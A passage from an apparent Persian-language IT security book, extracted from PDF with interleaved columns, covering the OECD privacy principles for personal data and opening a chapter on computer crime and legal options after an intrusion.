‫ﭘﻴﮕﺮﺩ ﻧﺒﻮﺩﻧﺪ‪ .‬ﺍﻣﺎ ﺩﺭ ﺍﺭﻭﭘﺎ ﻣﺴﺎﺋﻞ ﻃﻮﺭ ﺩﻳﮕـﺮﻱ ﺑـﻮﺩ‪ .‬ﺑـﺮ ﭘﺎﻳـﺔ‬
‫ﻫﺎﻱ ﻣﺮﺗﺒﻂ ﺑﺎ ﺁﻥ ﻫﺪﻑ ﺑﺎﺷﻨﺪ‪ .‬ﺍﻳﻦ ﺩﺍﺩﻩﻫﺎ ﺑﺎﻳـﺪ ﺩﻗﻴـﻖ‪،‬‬
‫ﺗﺠﺮﺑــﺔ ﺟﻨــﮓ ﺩﻭﻡ ﺟﻬــﺎﻧﻲ ﻛــﻪ ﺩﺭ ﺁﻥ ﺑــﺴﻴﺎﺭﻱ ﺍﺯ ﺍﻃﻼﻋــﺎﺕ‬
‫ﻛﺎﻣﻞ‪ ،‬ﻭ ﺑﻪﺭﻭﺯ ﻧﮕﻬﺪﺍﺭﻱ ﺷﻮﻧﺪ‪.‬‬
‫ﺷﺨﺼﻲ ﺗﻮﺳﻂ ﻧﺎﺯﻳﻬﺎ ﻣﻮﺭﺩ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﻗـﺮﺍﺭ ﮔﺮﻓـﺖ‪ ،‬ﺑﻴـﺸﺘﺮ‬
‫‪١٢٤‬‬ ‫ﺩﻭ‪‬ﻝ ﺍﺭﻭﭘﺎﻳﻲ ﺗﺮﺟﻴﺢ ﺩﺍﺩﻧﺪ ﺍﺯ ﻣﺆﺳﺴﺎﺕ ﺧﺎﺻﻲ ﺑﺮﺍﻱ ﺿﺎﺑﻄﻪﻣﻨﺪ‬
‫ﺍﺻﻞ ﺗﻌﺮﻳﻒ ﻫﺪﻑ‬
‫ﻛﺮﺩﻥ ﺟﻤﻊﺁﻭﺭﻱ ﻭ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻃﻼﻋﺎﺕ ﺷﺨﺼﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ‪.‬‬
‫ﻫﺪﻑ ﺍﺯ ﺟﻤﻊﺁﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ ﺷﺨـﺼﻲ ﺑﺎﻳـﺪ ﺩﺭ ﻫﻤـﺎﻥ‬
‫ﺍﺭﻭﭘﺎﻳﻴﺎﻥ ﺍﻳﺪﻩﻫﺎﻱ ﻣﻄﺮﺡ ﺩﺭ ﺁﻳﻴﻦﻧﺎﻣـﺔ ﺭﺍﻫﻜﺎﺭﻫـﺎﻱ ﺍﻃﻼﻋـﺎﺕ‬
‫ﻟﺤﻈﺔ ﺟﻤﻊﺁﻭﺭﻱ ﺩﺍﺩﻩﻫﺎ ﻭ ﻧﻪ ﺩﻳﺮﺗﺮ ﺍﺯ ﺁﻥ ﻣﺸﺨﺺ ﺑﺎﺷﺪ‪.‬‬
‫ﺑﺎﺯﺍﺭ ﺭﺍ ﺑﻪ ﻳﻚ ﻧﻈﺎ ﹺﻡ ﻛﻠﻲ ﻣﻮﺳﻮﻡ ﺑﻪ ﺣﻔﺎﻇﺖ ﺩﺍﺩﻩﻫﺎ‪ ١٢٠‬ﺗﻌﻤـﻴﻢ‬
‫ﺍﺳﺘﻔﺎﺩﻩﻫﺎﻱ ﺑﻌﺪﻱ ﺍﺯ ﺍﻃﻼﻋﺎﺕ ﺟﻤﻊﺁﻭﺭﻱﺷـﺪﻩ ﺑﺎﻳـﺪ ﺑـﻪ‬
‫ﺩﺍﺩﻧﺪ‪.‬‬
‫ﻫﻤﺎﻥ ﺍﻫﺪﺍﻑ ﻣﺤﺪﻭﺩ ﺷـﻮﺩ؛ ﻭ ﺍﮔـﺮ ﻫـﺪﻓﻬﺎﻱ ﺑﻌـﺪﻱ ﺑـﺎ‬
‫ﺍﻫﺪﺍﻑ ﺍﻭﻟﻴﻪ ﺳﺎﺯﮔﺎﺭﻱ ﻧﺪﺍﺭﻧﺪ ﺑﺎﻳﺪ ﺍﻳـﻦ ﺗﻐﻴﻴـﺮ ﺍﻫـﺪﺍﻑ ﺭﺍ‬

‫& ‪121 Organization for Economic Cooperation‬‬


‫‪Development‬‬
‫‪122 Collection Limitation Principle‬‬ ‫‪119 Antijunk-Fax Telephone Consumer Privacy‬‬
‫‪123 Data Quality Principle‬‬ ‫‪Act‬‬
‫‪124 Purpose Specification Principle‬‬ ‫‪120 Data Protection‬‬
‫‪١٧٧‬‬ ‫ﺑﺨﺶ ﺳﻮﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ‬

‫‪ o‬ﺑﺘﻮﺍﻧﺪ ﺩﺭﺑﺎﺭﺓ ﺍﻃﻼﻋﺎﺕ ﻣﺮﺑﻮﻁ ﺑﻪ ﺧﻮﺩ ﺑﺤﺚ ﻛﻨﺪ ﻭ‬ ‫ﺻﺮﺍﺣﺘﹰﺎ ﺍﻋـﻼﻡ ﻛـﺮﺩ ﻭ ﻧﻴـﺰ ﺍﻋـﻼﻡ ﺭﺿـﺎﻳﺖ ﻓـﺮﺩ ﺑـﺮﺍﻱ‬
‫ﺍﮔﺮ ﺩﺭ ﺑﺤﺚ ﻣﻮﻓﻖ ﺷـﺪ ﻗـﺎﺩﺭ ﺑﺎﺷـﺪ ﺍﻃﻼﻋـﺎﺕ ﺭﺍ‬ ‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻃﻼﻋﺎﺕ ﻭﻱ ﺩﺭ ﺍﻫﺪﺍﻑ ﺟﺪﻳﺪ ﺿﺮﻭﺭﻱ ﺍﺳﺖ‪.‬‬
‫ﺣﺬﻑ‪ ،‬ﺍﺻﻼﺡ ﻭ ﻳﺎ ﺗﻜﻤﻴﻞ ﻧﻤﺎﻳﺪ‪.‬‬
‫‪١٢٥‬‬
‫ﺍﺻﻞ ﻣﺤﺪﻭﺩﻳﺖ ﺍﺳﺘﻔﺎﺩﻩ‬
‫‪١٢٩‬‬
‫ﺍﺻﻞ ﭘﺎﺳﺨﮕﻮﻳﻲ‬ ‫ﺩﺍﺩﻩﻫﺎﻱ ﺷﺨﺼﻲ ﻧﺒﺎﻳﺪ ﺍﻓﺸﺎ ﺷـﻮﻧﺪ‪ ،‬ﺩﺭ ﺩﺳـﺘﺮﺱ ﻋﻤـﻮﻡ‬
‫ﻫﺮ ﮔﺮﺩﺁﻭﺭﻧﺪﺓ ﺍﻃﻼﻋﺎﺕ ﺑﺎﻳﺪ ﺩﺭ ﻗﺒـﺎﻝ ﻋﻤـﻞ ﺑـﻪ ﺍﺻـﻮﻝ‬ ‫ﻗﺮﺍﺭ ﮔﻴﺮﻧﺪ‪ ،‬ﻳﺎ ﺑﺮﺍﻱ ﺍﻫﺪﺍﻓﻲ ﻏﻴﺮ ﺍﺯ ﺁﻧﭽﻪ ﻛﻪ ﺍﻋﻼﻡ ﺷـﺪﻩ‬
‫ﺫﻛﺮﺷﺪﺓ ﺑﺎﻻ ﭘﺎﺳﺨﮕﻮ ﺑﺎﺷﺪ‪.‬‬ ‫‪ -‬ﻫﻤﺎﻧﻄﻮﺭ ﻛﻪ ﺩﺭ ﺍﺻﻮﻝ ﻗﺒﻞ ﮔﻔﺘـﻪ ﺷـﺪ ‪ -‬ﺑﻜـﺎﺭ ﺭﻭﻧـﺪ‪،‬‬
‫ﻣﮕﺮ‪:‬‬
‫ﺩﺭ ﺭﺍﻫﻜﺎﺭﻫﺎﻱ ‪ OECD‬ﺍﺟﺒﺎﺭ ﻗﺎﻧﻮﻥ ﺑﻪ ﭼﺸﻢ ﻧﻤﻲﺧـﻮﺭﺩ‪ ،‬ﺍﻣـﺎ‬
‫ﺩﺭ ﻋﻮﺽ ﻫﻨﮕﺎﻡ ﺑﺮﺭﺳﻲ ﻗﻮﺍﻧﻴﻦ ﻫﺮﻳﻚ ﺍﺯ ﻛﺸﻮﺭﻫﺎﻱ ﻋـﻀﻮ‪ ،‬ﺍﺯ‬ ‫ﻱ ﻣﺎﻟﻚ ﺍﻃﻼﻋﺎﺕ؛ ﻳﺎ‬
‫‪ o‬ﺑﺎ ﺭﺿﺎﻳﺖ ﻓﺮﺩ ﹺ‬
‫‪ o‬ﺑﺎ ﻳﻚ ﻣﺠﻮﺯ ﻗﺎﻧﻮﻧﻲ‪.‬‬
‫ﺍﻳﻦ ﻫﺸﺖ ﺍﺻﻞ ﺑﻌﻨﻮﺍﻥ ﺭﺍﻫﺒﺮﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﺩ‪.‬‬
‫‪١٢٦‬‬
‫ﺑﺮﺍﻱ ﻣﺸﺎﻫﺪﺓ ﻳﻚ ﻓﻬﺮﺳﺖ ﻛﻨﺘﺮﻝ ﺳـﺎﺩﻩ ﺩﺭ ﻣـﻮﺭﺩ ﻣﻌﻴﺎﺭﻫـﺎﻱ‬ ‫ﺍﺻﻞ ﺣﻔﺎﻇﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ‬
‫ﺣﻔﺎﻇﺖ ﺍﺯ ﺍﻃﻼﻋﺎﺕ ‪ -‬ﻛﻪ ﺩﺭﺻﻮﺭﺕ ﺟﻤـﻊﺁﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ ﺩﺭ‬ ‫ﺩﺍﺩﻩ ﻫﺎﻱ ﺷﺨﺼﻲ ﺑﺎﻳﺪ ﺑﺎ ﺣﻔﺎﻇﻬﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﻣﻨﺎﺳـﺐ ﺩﺭ‬
‫ﻣﻮﺭﺩ ﻣﺸﺘﺮﻳﺎﻥ ﺍﺯ ﺭﻭﻱ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﺑﺎﻳﺪ ﺍﺯ ﺁﻧﻬﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﻛـﺮﺩ ‪-‬‬ ‫ﻣﻘﺎﺑﻞ ﺧﻄﺮﺍﺗﻲ ﺍﺯ ﻗﺒﻴﻞ ﻧﺎﻗﺺ ﺷﺪﻥ‪ ،‬ﺩﺳﺘﺮﺳﻲ‪ ،‬ﺗﺨﺮﻳﺐ‪،‬‬
‫ﺑﺨﺶ ﺳﻮﻡ‬

‫ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﻪ ﻓﺼﻞ ﻳﺎﺯﺩﻫﻢ ﺍﺯ ﻫﻤﻴﻦ ﺑﺨﺶ ﻛﺘﺎﺏ ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ‪.‬‬ ‫ﺗﻐﻴﻴﺮ‪ ،‬ﺍﻓﺸﺎ‪ ،‬ﻭ ﺍﺳﺘﻔﺎﺩﺓ ﻏﻴﺮﻣﺠﺎﺯ ﻣﺮﺍﻗﺒﺖ ﺷﻮﻧﺪ‪.‬‬

‫‪١٢٧‬‬
‫ﺍﺻﻞ ﺑﺎﺯ ﺑﻮﺩﻥ‬
‫ﺑﺎﻳﺪ ﻳﻚ ﺳﻴﺎﺳﺖ ﻛﻠﻲ ﺩﺭﺑﺎﺭﺓ ﺷـﻔﺎﻑ ﺑـﻮﺩﻥ ﺭﺍﻫﻜﺎﺭﻫـﺎ ﻭ‬
‫ﺳﻴﺎﺳﺘﻬﺎ ﺑﺎ ﻧﮕﺎﻩ ﺧﺎﺹ ﺑﻪ ﺩﺍﺩﻩﻫﺎﻱ ﺷﺨﺼﻲ ﻭﺟﻮﺩ ﺩﺍﺷﺘﻪ‬
‫ﺑﺎﺷﺪ‪ .‬ﺑﺎﻳﺪ ﺍﺑﺰﺍﺭﻫﺎﻳﻲ ﻭﺟﻮﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷـﻨﺪ ﻛـﻪ ﺑـﻪ ﺁﺳـﺎﻧﻲ‬
‫ﺑﺘﻮﺍﻧﻨﺪ ﻃﺒﻴﻌﺖ ﺩﺍﺩﻩﻫﺎﻱ ﺷﺨﺼﻲ‪ ،‬ﻫﺪﻑ ﺍﺻﻠﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻭ‬
‫ﻫﻤﭽﻨﻴﻦ ﻣﺪﺕ ﻣﺘﻌﺎﺭﻑ ﻧﮕﻬﺪﺍﺭﻱ ﺍﺯ ﺁﻧﻬﺎ ﺭﺍ ﻣﻌﻴﻦ ﻛﻨﻨﺪ‪.‬‬

‫‪١٢٨‬‬
‫ﺍﺻﻞ ﻣﺸﺎﺭﻛﺖ ﻓﺮﺩﻱ‬
‫ﻫﺮ ﻛﺴﻲ ﺑﺎﻳﺪ ﺍﻳﻦ ﺣﻖ ﺭﺍ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﻛﻪ‪:‬‬
‫ﺑﻔﻬﻤــﺪ ﺍﻃﻼﻋــﺎﺗﻲ ﺍﺯ ﻭﻱ ﺩﺭ ﺩﺳــﺖ ﮔﺮﺩﺁﻭﺭﻧــﺪﺓ‬ ‫‪o‬‬
‫ﺍﻃﻼﻋﺎﺕ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻳﺎ ﺧﻴﺮ؛‬
‫‪ o‬ﺑﺎ ﮔﺮﺩﺁﻭﺭﻧﺪﺓ ﺍﻃﻼﻋﺎﺕ ﻣﺮﺑﻮﻁ ﺑـﻪ ﺧـﻮﺩ‪ :‬ﺩﺭ ﻳـﻚ‬
‫ﺯﻣﺎﻥ ﻣﻌﻘﻮﻝ‪ ،‬ﺑﺎ ﻫﺰﻳﻨﻪ ﺍﻱ ﺍﺭﺯﺍﻥ‪ ،‬ﺑﺎ ﺭﻭﺷﻲ ﻣﻌﻘﻮﻝ‪،‬‬
‫ﻭ ﺩﺭ ﺣﺎﻟﺘﻲ ﻛﻪ ﺍﻃﻼﻋﺎﺕ ﺑﺮﺍﻳﺶ ﺷـﻔﺎﻑ ﺑﺎﺷـﺪ ﺩﺭ‬
‫ﺍﺭﺗﺒﺎﻁ ﺑﺎﺷﺪ؛‬
‫‪ o‬ﺍﮔﺮ ﻳﻜﻲ ﺍﺯ ﺩﺭﺧﻮﺍﺳـﺘﻬﺎﻱ ﺑـﺎﻻ ﺭﺩ ﺷـﺪ ﺑـﺮﺍﻱ ﺁﻥ‬
‫ﺩﻟﻴﻞ ﺑﺨﻮﺍﻫﺪ ﻭ ﺑﺘﻮﺍﻧﺪ ﺁﻧﺮﺍ ﺑﻪ ﭼﺎﻟﺶ ﺑﻜﺸﺪ؛ ﻭ‬

‫‪125‬‬ ‫‪Use Limitation Principle‬‬


‫‪126‬‬ ‫‪Security Safeguards Principle‬‬
‫‪127‬‬ ‫‪Openness Principle‬‬
‫‪129 Accountalility Principle‬‬ ‫‪128‬‬ ‫‪Individual Participation Principle‬‬
‫‪١٧٩‬‬ ‫ﺑﺨﺶ ﺳﻮﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ‬

‫ﭘﺮﺩﺍﺧﺖ‪ ١٣٠.‬ﺑﺎ ﺍﻳﻨﺤﺎﻝ ﺩﺳﺘﺮﺳـﻲ ﺟﻬـﺎﻧﻲ ﺑـﻪ ﺍﻳﻨﺘﺮﻧـﺖ‪ ،‬ﻭﺟـﻮﺩ‬


‫ﻗـﻮﺍﻧﻴﻨﻲ ﻛـﻪ ﺍﺯ ﺩﺍﺧــﻞ ﺍﻳـﺎﻻﺕ ﻣﺘﺤـﺪﻩ ﻧــﺸﺄﺕ ﻧﮕﺮﻓﺘـﻪﺍﻧــﺪ ﺭﺍ‬
‫ﺿﺮﻭﺭﻱ ﻛﺮﺩﻩ ﺍﺳﺖ‪.‬‬
‫ﻗﺒﻞ ﺍﺯ ﻫﺮﮔﻮﻧﻪ ﺗﺼﻤﻴﻢ ﺑﻪ ﺁﻏﺎﺯ ﻣﺮﺍﺣﻞ ﻗﺎﻧﻮﻧﻲ ﺑـﺎ ﻳـﻚ ﻭﻛﻴـﻞ‬
‫ﺯﺑﺪﻩ ﻣﺸﻮﺭﺕ ﻛﻨﻴﺪ‪ .‬ﭼﻮﻥ ﺩﺭ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﺭﻭﻳﻜﺮﺩﻫـﺎﻱ ﻗـﺎﻧﻮﻧﻲ‬ ‫ﻓﺼﻞ ﻧﻬﻢ‬
‫ﺧﻄﺮﺍﺕ ﻭ ﻣﺸﻜﻼﺗﻲ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ‪ ،‬ﺑﺎﻳـﺪ ﻗﺒـﻞ ﺍﺯ ﺷـﺮﻭﻉ ﭘﻴﮕـﺮﺩ‬ ‫ﺟﺮﺍﺋﻢ ﺭﺍﻳﺎﻧﻪﺍﻱ‬
‫ﻗﺎﻧﻮﻧﻲ ﻧﺴﺒﺖ ﺑﻪ ﺍﻧﺠﺎﻡ ﺁﻥ ﻣﻄﻤﺌﻦ ﺑﺎﺷﻴﺪ‪.‬‬
‫ﺩﺭ ﺑﺮﺧﻲ ﻣﻮﺍﺭﺩ ﻣﻤﻜﻦ ﺍﺳﺖ ﭼﺎﺭﻩﺍﻱ ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻭ ﻣﻠـﺰﻡ ﺑـﻪ‬ ‫ﻛﻠﻴﺎﺕ‬
‫ﻼ‪:‬‬
‫ﺍﻧﺠﺎﻡ ﭘﻴﮕﺮﺩ ﻗﺎﻧﻮﻧﻲ ﺑﺎﺷﻴﺪ‪ .‬ﻣﺜ ﹰ‬
‫ﺍﻣﻴﺪﻭﺍﺭﻳﻢ ﻫﻴﭽﻮﻗﺖ ﻣﺠﺒﻮﺭ ﻧﺸﻮﻳﺪ ﺑﺮ ﺍﺳﺎﺱ ﺍﻃﻼﻋﺎﺕ ﻣﻮﺟـﻮﺩ‬
‫ﺍﮔﺮ ﺑﺨﻮﺍﻫﻴﺪ ﺑﺮﺍﻱ ﺷﺮﻛﺖ ﺑﻴﻤﻪ ﺍﺩﻋﺎﻧﺎﻣﻪﺍﻱ ﺗﻨﻈﻴﻢ ﻛﻨﻴﺪ‬ ‫•‬ ‫ﺩﺭ ﺍﻳﻦ ﻓﺼﻞ ﻋﻤﻞ ﻛﻨﻴﺪ‪ .‬ﻣﻤﻜﻦ ﺍﺳﺖ ﺍﻳﻦ ﻛﺘﺎﺏ ﺭﺍ ﺑﺎ ﻛﻮﺷـﺶ‬
‫ﺗﺎ ﺧﺴﺎﺭﺗﻲ ﻛﻪ ﺩﺭ ﺍﺛﺮ ﻳﻚ ﻧﻔـﻮﺫ ﺑـﻪ ﺷـﻤﺎ ﻭﺍﺭﺩ ﺷـﺪﻩ ﺭﺍ‬ ‫ﻓﺮﺍﻭﺍﻥ ﻣﻄﺎﻟﻌﻪ ﻛﺮﺩﻩ ﺑﺎﺷﻴﺪ ﻭ ﻫﻤﺔ ﮔﺎﻣﻬﺎﻱ ﻣﻬﻢ ﺩﺭ ﺟﻬﺖ ﺣﻔﻆ‬
‫ﺟﺒﺮﺍﻥ ﻛﻨﺪ‪ ،‬ﻣﻤﻜﻦ ﺍﺳﺖ ﺍﺯ ﺟﺎﻧﺐ ﺷﺮﻛﺖ ﺑﻴﻤﻪ ﻣﻠﺰﻡ ﺑﻪ‬ ‫ﺍﻣﻨﻴﺖ ﺳﻴﺴﺘﻢ ﺧﻮﺩ ﺭﺍ ﺑﺮﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ‪ ،‬ﺍﻣﺎ ﺑﺎ ﺗﻤـﺎﻡ ﺍﻳـﻦ ﺍﺣـﻮﺍﻝ‬
‫ﺍﻧﺠﺎﻡ ﭘﻴﮕﺮﺩ ﻗﺎﻧﻮﻧﻲ ﻋﻠﻴﻪ ﻧﻔﻮﺫﮔﺮﺍﻥ ﺷﻮﻳﺪ‪.‬‬ ‫ﻫﻤﭽﻨﺎﻥ ﻣﻤﻜﻦ ﺍﺳﺖ ﺳﻴﺴﺘﻢ ﺷﻤﺎ ﻣـﻮﺭﺩ ﺳـﻮﺀ ﺍﺳـﺘﻔﺎﺩﻩ ﻗـﺮﺍﺭ‬
‫ﺑﺨﺶ ﺳﻮﻡ‬

‫ﺍﮔﺮ ﺍﻃﻼﻋﺎﺕ ﺧﺎﺹ ﻭ ﻃﺒﻘﻪﺑﻨﺪﻱ ﺷـﺪﻩﺍﻱ ﺭﺍ ﭘـﺮﺩﺍﺯﺵ‬ ‫•‬


‫ﻼ ﻛﺎﺭﻣﻨﺪ ﺷﻤﺎ ﺑﻮﺩﻩ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻳﻚ‬‫ﺑﮕﻴﺮﺩ‪ .‬ﺷﺎﻳﺪ ﻓﺮﺩﻱ ﻛﻪ ﻗﺒ ﹰ‬
‫ﻣﻲﻛﻨﻴﺪ ﻣﻤﻜﻦ ﺍﺳﺖ ﻗﻮﺍﻧﻴﻦ ﺩﻭﻟﺘـﻲ ﺷـﻤﺎ ﺭﺍ ﻣﻠـﺰﻡ ﺑـﻪ‬ ‫ﺣﺴﺎﺏ ﻗﺪﻳﻤﻲ ﺑﻪ ﺳﻴﺴﺘﻢ ﻧﻔـﻮﺫ ﻭ ﺑﻌـﻀﻲ ﺍﺯ ﺳـﻮﺍﺑﻖ ﺭﺍ ﺣـﺬﻑ‬
‫ﺍﻧﺠﺎﻡ ﺗﺤﻘﻴﻘـﺎﺕ ﻭ ﺍﺭﺍﺋـﻪ ﮔـﺰﺍﺭﺵ ﺩﺭ ﻣـﻮﺭﺩ ﻓﻌﺎﻟﻴﺘﻬـﺎﻱ‬ ‫ﻛﻨﺪ‪ .‬ﻋﻠﻴﺮﻏﻢ ﺗﻤﺎﻡ ﺗﻼﺷﻬﺎﻱ ﺷﻤﺎ ﺑﺮﺍﻱ ﺟﻠـﻮﮔﻴﺮﻱ ﺍﺯ ﻋﻤﻠﻴـﺎﺕ‬
‫ﻣﺸﻜﻮﻙ ﻛﻨﻨﺪ‪.‬‬ ‫ﻧﻔﻮﺫ‪ ،‬ﺷﺎﻳﺪ ﻓﺮﺩﻱ ﺍﺯ ﻳﻚ ﻛﺸﻮﺭ ﺧﺎﺭﺟﻲ ﺑﺘﻮﺍﻧﺪ ﺑﻪ ﺳﻴﺴﺘﻢ ﺷـﻤﺎ‬
‫ﻭﺍﺭﺩ ﺷﻮﺩ‪ .‬ﺩﺭ ﺍﻳﻦ ﺷﺮﺍﻳﻂ ﺷﻤﺎ ﭼﻪ ﻣﺪﺭﻛﻲ ﺑﺮﺍﻱ ﺍﺭﺍﺋﻪ ﺑﻪ ﺩﺍﺩﮔﺎﻩ‬
‫ﺍﮔﺮ ﺍﺯ ﻳﻚ ﻓﻌﺎﻟﻴﺖ ﻏﻴﺮﻗﺎﻧﻮﻧﻲ ﺁﮔﺎﻩ ﺷﻮﻳﺪ ﻭ ﺁﻧﺮﺍ ﮔـﺰﺍﺭﺵ‬ ‫•‬
‫ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﺧﻮﺍﻫﻴﺪ ﺩﺍﺷـﺖ؟ ﻋـﻼﻭﻩ ﺑـﺮ ﺍﻳـﻦ ﻣـﻲﺗـﻮﺍﻥ ﭘﺮﺳـﻴﺪ‬
‫ﻧﻜﻨﻴﺪ ﺍﺯ ﻧﻈﺮ ﻗﺎﻧﻮﻥ ﺑﻌﻨﻮﺍﻥ "ﻣﻌﺎﻭﻧﺖ ﺩﺭ ﺟﺮﻡ" ﻣـﺴﺌﻮﻟﻴﺖ‬ ‫ﻫﻨﮕﺎﻣﻲ ﻛﻪ ﺍﺯ ﺳﻴﺴﺘﻢ ﺍﺳﺘﻔﺎﺩﺓ ﻋﺎﺩﻱ ﻣﻲﻛﻨﻴﺪ‪ ،‬ﭼﻪ ﺧﻄﺮﺍﺗـﻲ ﺍﺯ‬
‫ﺧﻮﺍﻫﻴﺪ ﺩﺍﺷﺖ‪ ،‬ﺑﺨﺼﻮﺹ ﺍﮔـﺮ ﺭﺍﻳﺎﻧـﺔ ﺷـﻤﺎ ﻫـﻢ ﺩﺭ ﺁﻥ‬ ‫ﺟﺎﻧﺐ ﻗﺎﻧﻮﻥ ﻭ ﺳﻴﺴﺘﻢ ﺣﻘﻮﻗﻲ ﺷﻤﺎ ﺭﺍ ﺗﻬﺪﻳـﺪ ﻣـﻲﻛﻨﻨـﺪ؟ ﺍﮔـﺮ‬
‫ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﻏﻴﺮﻗﺎﻧﻮﻧﻲ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪ ﺑﺎﺷﺪ‪.‬‬ ‫ﻫﺪﻑ ﻳﻚ ﺷﻜﺎﻳﺖ ﻗﺎﻧﻮﻧﻲ ﻗﺮﺍﺭ ﺑﮕﻴﺮﻳﺪ ﭼﻪ ﻣﻲﻛﻨﻴﺪ؟ ﺍﻳﻦ ﻓﺼﻞ‬
‫ﺍﮔﺮ ﺍﺯ ﺭﺍﻳﺎﻧـﺔ ﺷـﻤﺎ ﺑـﺮﺍﻱ ﺍﻧﺠـﺎﻡ ﻛﺎﺭﻫـﺎﻱ ﻏﻴﺮﻣﺠـﺎﺯ ﻭ‬ ‫•‬ ‫ﺗﻼﺵ ﺩﺍﺭﺩ ﺍﻳﻦ ﻣﺴﺎﺋﻞ ﺭﺍ ﺭﻭﺷﻦ ﻛﻨـﺪ‪ .‬ﺑـﻪ ﺁﻧﭽـﻪ ﻛـﻪ ﺩﺭ ﺍﻳـﻦ‬
‫ﻧﺎﺩﺭﺳﺖ ﺍﺳﺘﻔﺎﺩﻩ ﺷﻮﺩ ﻭ ﺷﻤﺎ ﺩﺭ ﻗﺒﺎﻝ ﺁﻥ ﻛـﺎﺭﻱ ﻧﻜﻨﻴـﺪ‬ ‫ﻓﺼﻞ ﺑﻴﺎﻥ ﺷﺪﻩ ﺻﺮﻓﹰﺎ ﺑﺎﻳﺪ ﺑﻌﻨﻮﺍﻥ ﺗﻮﺻﻴﻪﻫﺎﻱ ﻛﻠﻲ ﺗﻮﺟﻪ ﻛـﺮﺩ‬
‫ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﻪ ﺧﺎﻃﺮ ﺧﺮﺍﺑﻴﻬﺎﻱ ﺍﻳﺠﺎﺩ ﺷﺪﻩ ﻋﻠﻴـﻪ ﺷـﻤﺎ‬ ‫ﻭ ﻧﻪ ﻣﺴﺎﺋﻞ ﻗﺎﻧﻮﻧﻲ ﻭ ﺣﻘﻮﻗﻲ؛ ﭼﺮﺍﻛﻪ ﺑـﺮﺍﻱ ﺟﺰﺋﻴـﺎﺕ ﺑﻴـﺸﺘﺮ ﻭ‬
‫ﺷﻜﺎﻳﺖ ﻛﻴﻔﺮﻱ ﺻﻮﺭﺕ ﺑﮕﻴﺮﺩ‪.‬‬ ‫ﻣﺴﺎﺋﻞ ﺭﻳﺰﺗﺮ ﺑﺎﻳﺪ ﺍﺯ ﻭﻛﻼﻱ ﺧﻮﺏ ﻭ ﻣﺸﺎﻭﺭﺍﻥ ﺣﻘﻮﻗﻲ ﻣﺠـﺮﺏ‬
‫ﺑﺨﻮﺍﻫﻴـﺪ ﺑـﺮ ﺣــﺴﺐ ﻗـﻮﺍﻧﻴﻦ ﻛـﺸﻮﺭ ﻣﺤــﻞ ﺍﻗﺎﻣﺘﺘـﺎﻥ ﺷــﻤﺎ ﺭﺍ‬
‫ﺍﮔﺮ ﻣﺪﻳﺮ ﺍﺟﺮﺍﻳﻲ ﻳﻚ ﺷﺮﻛﺖ ﺩﻭﻟﺘـﻲ ﺑﺎﺷـﻴﺪ ﻭ ﺗـﺼﻤﻴﻢ‬ ‫•‬
‫ﺭﺍﻫﻨﻤﺎﻳﻲ ﻛﻨﻨﺪ‪.‬‬
‫ﺑﮕﻴﺮﻳﺪ ﻛـﻪ ﻓﻌﺎﻟﻴﺘﻬـﺎﻱ ﻏﻴﺮﻗـﺎﻧﻮﻧﻲ ﺭﺍ ﺗﺤـﺖ ﭘﻴﮕـﺮﺩ ﻭ‬
‫ﺗﺠﺴﺲ ﻗﺮﺍﺭ ﻧﺪﻫﻴﺪ‪ ،‬ﺳﻬﺎﻣﺪﺍﺭﺍﻥ ﺷﺮﻛﺖ ﺷﻤﺎ ﻣﻲﺗﻮﺍﻧﻨـﺪ‬
‫ﮔﺰﻳﻨﻪﻫﺎﻱ ﺣﻘﻮﻗﻲ ﻣﻮﺟﻮﺩ ﺩﺭ ﭘﻲ ﻭﻗﻮﻉ ﻳﻚ ﻧﻔﻮﺫ‬
‫ﻋﻠﻴﻪ ﺷﻤﺎ ﺍﻗﺎﻣﺔ ﺩﻋﻮﻱ ﻛﻨﻨﺪ‪.‬‬
‫ﺍﮔﺮ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺷﻤﺎ ﺩﺭ ﺍﺛﺮ ﻧﻔﻮﺫ ﺩﭼﺎﺭ ﺁﺳﻴﺐ ﺷﻮﻧﺪ ﻣﻤﻜﻦ ﺍﺳـﺖ‬
‫ﺩﺭ ﺳﻴﺴﺘﻢ ﺣﻘﻮﻗﻲ ﻭ ﻗﺎﻧﻮﻧﻲ ﻛﺸﻮﺭ ﻣﺤﻞ ﺍﻗﺎﻣﺘﺘﺎﻥ ﮔﺰﻳﻨـﻪﻫـﺎﻱ‬
